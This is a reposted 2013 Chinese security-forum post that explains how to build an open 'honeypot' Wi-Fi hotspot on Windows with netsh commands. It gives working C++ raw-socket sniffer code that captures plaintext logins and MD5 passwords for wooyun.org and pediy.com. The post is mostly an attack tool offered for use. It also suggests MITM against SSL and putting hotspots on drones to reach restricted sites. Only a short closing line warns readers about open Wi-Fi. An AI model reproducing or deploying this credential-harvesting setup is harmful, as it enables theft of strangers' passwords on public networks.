首页
社区
课程
招聘
[旧帖] [转帖]Windows下的无线热点蜜罐 0.00雪花
发表于: 2013-10-20 20:13 1423

[旧帖] [转帖]Windows下的无线热点蜜罐 0.00雪花

2013-10-20 20:13
1423
Windows下的无线热点蜜罐

/**************************************

/* 作者:半斤八兩

/* 博客:efcK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3y4F1j5X3I4G2k6%4y4Q4x3X3g2U0L8$3#2Q4x3V1k6T1K9X3u0D9j5%4u0S2j5$3E0W2k6l9`.`.

/* 日期:2013-09-30 23:59

/**************************************

只是感兴趣,没有其他目的。失误之处敬请诸位大侠赐教!

在许多公共场所我们都会看到有许多免密码的无线热点.我们大多数的人发现有免密热点,都会很高兴的感慨, “运气真好,居然有不要密码的无线热点.” 可是否有人知道自己连上的是一个正在监视自己的眼睛?

WIFI即Hotspot也称无线热点,是指在公共场所提供无线局域网(WLAN)接入Internet服务的地点。这类地点多数是咖啡馆、机场、车站、商务酒店、高等院校、大型展览会馆等。这些热点有的是收费的提供无线宽带接入服务,有的则是免费的。在无线热点覆盖的地区,用户可以通过使用装有内置或外置无线网卡的笔记本电脑和PDA,来实现对Internet的接入。

试验平台:winn7 x86 台式机

工具: 无线网卡(USB)接收器

首先们来说一下怎样搭建wifi 蜜罐.

Win7下有一个命令可以创建个wifi.

netsh wlan set hostednetwork ssid=pass:123456789 key=123456789

Ssid 就是上图中显示的东西.

防止别人不知道密码,我们就改成 pass:123456789

Key 我们就直接弄成 123456789

这里要注意, ssid 尽量不要弄中文的.经本人测试,发现iphone不支持中文ssid.

然后我们用命令启动它.

netsh wlan start hostednetwork

这一些前提是我们要先插上wifi 接收器.

否则我们创建虚拟wifi 是不会成功的.

现在创建好了,我们写个抓包小程序,就可以等着chicken上勾就行了.

抓包我们要用混杂模式. 混杂模式可以抓到当前电脑所有网卡数据包.

#include <stdio.h>
#include <winsock2.h>
#include "DataStruct.h"
#include "InitSocket.h"
#include <iostream>
#include "mstcpip.h"
using namespace std;
CInitSocket initSock;

int nRet = 0;
void IsWifiHoneypots(PCHAR pBuff)
{
    PIPHEADER pIphdr = (PIPHEADER)pBuff;

    pBuff += (pIphdr->ipVersion & 0xf) * sizeof(ULONG);

    PTCPHEADER pTcpHdr = (PTCPHEADER)pBuff;

    memset(szText, ' ', nRet);

    int dataLen = nRet - sizeof(IPHEADER) - sizeof(TCPHEADER);

    memcpy(szText, &pBuff[sizeof(TCPHEADER)], dataLen);
   
    int i = 0;
    char szEmail[MAXBYTE] = {0};
    PCHAR pEmail = szEmail;

    if(strstr(szText, "wooyun.org"))
    if(strstr(szText, "email"))
    {
        puts("--------------------------------------------");
        cout<<"found Wooyun.org password:" << endl;

        pEmail = strstr(szText, "email");

        for(i = 0; (pEmail[i] != '&'); i++);

        pEmail[i] = '\0';
        
        puts(pEmail);

        pEmail += i + 1;

        if(strstr(pEmail, "password"))
        {        
            pEmail = strstr(pEmail, "password");
            
            for(i = 0; (pEmail[i] != '&'); i++);
            
            pEmail[i] = '\0';
            
            puts(pEmail);
        }

        puts("--------------------------------------------");
    }

    if(strstr(szText, "pediy.com"))
        if(strstr(szText, "username"))
        {
            puts("--------------------------------------------");
            cout<<"found pediy.com password:" << endl;
            
            pEmail = strstr(szText, "username");
            
            for(i = 0; (pEmail[i] != '&'); i++);
            
            pEmail[i] = '\0';
            
            puts(pEmail);
            
            pEmail += i + 1;
            
            if(strstr(pEmail, "md5password_utf="))
            {        
                pEmail = strstr(pEmail, "md5password_utf=");
               
                for(i = 0; (pEmail[i] != 0x20); i++);
               
                pEmail[i] = '\0';
               
                puts(pEmail);
            }
            
            puts("--------------------------------------------");
    }
}

int main(void)
{
    system("chcp 936 & cls & title windows wifi 蜜罐 by 半斤八兩 & color 0a");

    SOCKET sRaw = socket(AF_INET, SOCK_RAW, IPPROTO_IP);

    char szHostName[56];

    SOCKADDR_IN localAddr;
   
    struct hostent *pHost;
    gethostname(szHostName, 56);
    if ((pHost = gethostbyname((char*)szHostName)) == NULL)
    {
        return 0;
    }
    localAddr.sin_family = AF_INET;
    localAddr.sin_port  = htons(0);
    memcpy(&localAddr.sin_addr.S_un.S_addr, pHost->h_addr_list[1], pHost->h_length);

    if (bind(sRaw, (PSOCKADDR)&localAddr, sizeof(localAddr)) == SOCKET_ERROR)
    {
        return 0;
    }

    DWORD dwValue = 1;

    if (ioctlsocket(sRaw, SIO_RCVALL, &dwValue) != 0)
    {
        return 0;
    }

    cout << "<<Listen in Wooyun.org and pediy.com>>" << endl << endl;

    char buff[1024];
    while(true)
    {
        nRet = recv(sRaw, buff, 1024, 0);
        if (nRet > 0)
        {
            buff[nRet] = '\0';
            IsWifiHoneypots(buff);
        }
    }
    closesocket(sRaw);
    return 0;
}

为了敢在国庆前之前,代码写的有点乱.大家将就的看吧.(应该还有不少BUG.但是wooyun 和 看雪的,应该都能抓到了.)

Wooyun的post直接是明文的密码, 看雪的还是做了md5 处理.

如果遇到了ssl的可以用mitm 处理. (这里就不说了,网上有很多资料.)

通过文篇文章大家应该注意 不要随意上没有密码的 wifi..

我们设想一下,如果是一个不让进的,或者什么高级产所,我们的wifi信号不够广, 我们可以用一个小车子,将wifi热点放上去. 开启明显的ssid. 杀进去.

如果是高楼大厦,那我们可以将wifi热点 装进小飞机,杀进去.~

PDF下载<看雪学院>

[原文地址]

本文“Windows下的无线热点蜜罐”,来自:Nuclear'Atk 网络安全研究中心,本文地址:30bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3I4U0P5q4)9J5k6h3y4U0i4K6u0r3i4K6y4r3K9g2)9K6c8o6x3&6x3K6u0Q4c8f1k6Q4b7V1y4Q4z5p5y4Q4c8e0S2Q4b7V1c8Q4b7f1y4Q4c8e0S2Q4b7V1c8Q4b7V1c8Q4c8e0S2Q4b7f1k6Q4b7U0N6Q4c8e0k6Q4b7U0y4Q4b7e0S2Q4c8e0k6Q4z5e0S2Q4z5p5g2Q4c8e0c8Q4b7V1c8Q4z5f1y4Q4c8e0S2Q4z5o6m8Q4z5o6g2Q4c8e0g2Q4z5p5k6Q4z5p5q4Q4c8e0g2Q4z5o6N6Q4b7V1q4Q4c8e0g2Q4b7e0c8Q4z5o6c8Q4c8f1k6Q4b7V1y4Q4z5o6p5`.

[培训]科锐软件逆向54期预科班、正式班开始火爆招生报名啦!!!

收藏
免费 0
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回